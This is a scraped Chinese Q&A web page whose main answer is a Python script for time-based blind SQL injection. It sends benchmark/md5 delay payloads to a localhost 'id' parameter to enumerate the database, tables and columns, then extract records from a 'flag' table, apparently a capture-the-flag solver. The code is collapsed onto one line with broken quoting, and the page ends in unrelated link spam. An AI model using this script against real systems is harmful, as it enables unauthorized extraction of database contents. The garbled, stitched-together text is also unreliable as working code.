问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

漏洞类型:SQL注入/Timing

发布网友 发布时间:2022-04-10 15:01

我来回答

2个回答

懂视网 时间:2022-04-10 19:23

requests urlx = ‘http://127.0.0.1/?id= 1 and if((substr((select database()),‘ payloads = ‘qwertyuiopasdfghjklzxcvbnm{}_0123456789‘ def guess_column(table): string = ‘‘ extend = 0 list = [] length2 = 0 num = [] num1 = [] url1 = ‘http://127.0.0.1/?id= 1 and if(((select count(column_name) from information_schema.columns where table_name=‘‘+ table + ‘‘)=‘ url2 = ‘http://127.0.0.1/?id= 1 and if((substr((select column_name from information_schema.columns where table_name=‘‘ + table + ‘‘ limit ‘ url3 = ‘http://127.0.0.1/?id= 1 and if(((select length(column_name) from information_schema.columns where table_name=‘‘ + table + ‘‘ limit ‘ url4 = ‘http://127.0.0.1/?id= 1 and if(((substr((select ‘ url5 = ‘http://127.0.0.1/?id= 1 and if(((select count(‘ url7 = ‘http://127.0.0.1/?id= 1 and if(((select length(‘ for i in range(50): #获取字段数量 url = url1 + str(i) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) print(url) time = r.elapsed.total_seconds() print(time) if time > 1.5: extend = i length2 = i break for k in range(extend): st = ‘‘ extend1 = 0 for m in range(100): url = url3 + str(k) + ‘,1)=‘ + str(m) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ #获取字段长度 r = requests.get(url) if time > 1.5: extend1 = m break for i in range(1,extend1+1): #获取字段 for payload in payloads: url = url2 + str(k) + ‘,1),‘ + str(i) + ‘,1)=‘‘ + payload + ‘‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) st += payload break list.append(st) num1.append(st) length = 0 for i in range(1,10000): #获取记录数量 url = url5 + str(num1[0]) + ‘) from ‘ + table + ‘)=‘ + str(i) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ print(url) r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: length = i break for column in list: str1 = ‘‘ for i in range(length): length1 = 0 url6 = url4 + str(column) + ‘ from ‘ + table + ‘ limit ‘ + str(i) for k in range(100): #获取记录长度 url = url7 + str(column) + ‘) from ‘+ table + ‘ limit ‘ + str(i) + ‘,1)=‘ + str(k) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) length1 = k break for n in range(1,length1+1): #获取记录 for payload in payloads: url = url6 + ‘,1),‘ + str(n) + ‘,1))=‘‘ + str(payload) + ‘‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) str1 += payload break num.append(str1) str1 = ‘‘ for column in num1: print(column+‘ ‘,end=‘‘) print(‘ ‘,end=‘‘) for i in range(length2): for k in range(length): x = i + length * k print(num[x]+‘ ‘,end=‘‘) print(‘ ‘,end=‘‘) def guess_table(): string = ‘‘ extend = 0 list = [] url1 = ‘http://127.0.0.1/?id= 1 and if(((select count(table_name) from information_schema.tables where table_schema=database())=‘ url2 = ‘http://127.0.0.1/?id= 1 and if((substr((select table_name from information_schema.tables where table_schema=database() limit ‘ url3 = ‘http://127.0.0.1/?id= 1 and if(((select length(table_name) from information_schema.tables where table_schema=database() limit ‘ for i in range(50): url = url1 + str(i) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend = i break for k in range(extend): st = ‘‘ extend1 = 0 for m in range(100): url = url3 + str(k) + ‘,1)=‘ + str(m) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend1 = m break for i in range(1,extend1+1): for payload in payloads: url = url2 + str(k) + ‘,1),‘ + str(i) + ‘,1)=‘‘ + payload + ‘‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: st += payload break list.append(st) print(‘------------‘) for i in list: print(f‘[*]{i}‘) print(‘------------‘) guess_column(‘flag‘) def main(): string = ‘‘ url1 = ‘http://127.0.0.1/?id= 1 and if((length(database())=‘ extend = 0 for k in range(20): url = url1 + str(k) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend = k break for i in range(1,extend+1): for payload in payloads: url = urlx + str(i) + ‘,1)=‘‘ url = url + payload + ‘‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: string += payload break print(f‘available database [*] {string}‘) guess_table() main()

 

sql注入------基于时间延迟benchmark函数注入脚本

标签:def   get   []   cond   lag   url   bsp   main   chm   

热心网友 时间:2022-04-10 16:31

您试试用亿思平台测试一下咯!
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
找专业防水队做完还漏水怎么维权 法院会受理房屋漏水造成的纠纷吗? 巴西龟最长活多久,家养!!! 养胃的药最好的是什么啊 婴儿积食发烧不愿吃药怎么办 板门穴位在哪个部位 手机设置放偷看的方法? 凝结水回收器生产厂家? 个人账户养老金预测公式:现有5万元,缴费20年,能领多少钱? 临沂比较有名的男装品牌 怎样开通微信乘车码 微信怎么开启微信乘车码 微信开启微信乘 世说新语全文 《新五代史杂传 和凝》译文 蝴蝶兰千面桃花姬在线阅读 《世说新语》全文翻译 《叶满长安京》随宇而安txt全集下载 将军夫人娇养手册(重生)_by橘生淮南兮_txt全文免费阅读 相忘于江湖全文翻译 《穿书后女配和反派的人设都崩了》txt下载在线阅读全文,求百度网盘云资源 泥泥狗读后感? 朝花夕拾五猖会读后感悟 史铁生有关庙的回忆读后感 邓秀茵记忆天使读后感 有关庙的回忆。感悟200字 谢谢 急求 有关庙的回忆的读后感 USB端口为只读 我的电脑usb插什么都是只读 USB被管理员设置为只能只读,怎么样破解 什么是sql注入攻击 和 脚本注入攻击? 中国牙医大学排名 山东哪个专科大学牙科好啊? 山东省有哪些牙医学校谢谢了,大神帮忙啊 学牙医什么学校好 学牙医比较好的大学有什么 找在山东的口腔医学专业的学校 学牙医有哪些大学,近年分数线多少 我想学牙科 请问哪个学校比较好 讲下面代码加在哪里 FATE补魔图 全的/// lxryx2156236@gmail.com 仙剑奇侠传1在哪下载?? 求一个关于11班的群名、群名的前缀要和11有关、而且要用来做群里人的名片的前缀 尊敬的农行用户:您手机银行积分满2152分,可以兑换215元现金,请用户登入 ny.w.com 我 谁能给我一个最新的MP4的视频转换文件 http://hkbici.com/forum.php?mod=forumdisplay&action=list&fid=215&filter=typeid&typeid=1029 求出处 小妹急求office2010的密钥。有的朋友请帮忙,发到abcde215@tom.com O(∩_∩)O谢谢 谁有李雨春和何洁蒙牛的图片? 怎么清除21575导航?? 诺基亚215手机qq下载 《中华经典成语故事》215.游刃有余MP3
懂视IT 51dongshi.com 版权所有
Copyright © 2019-2024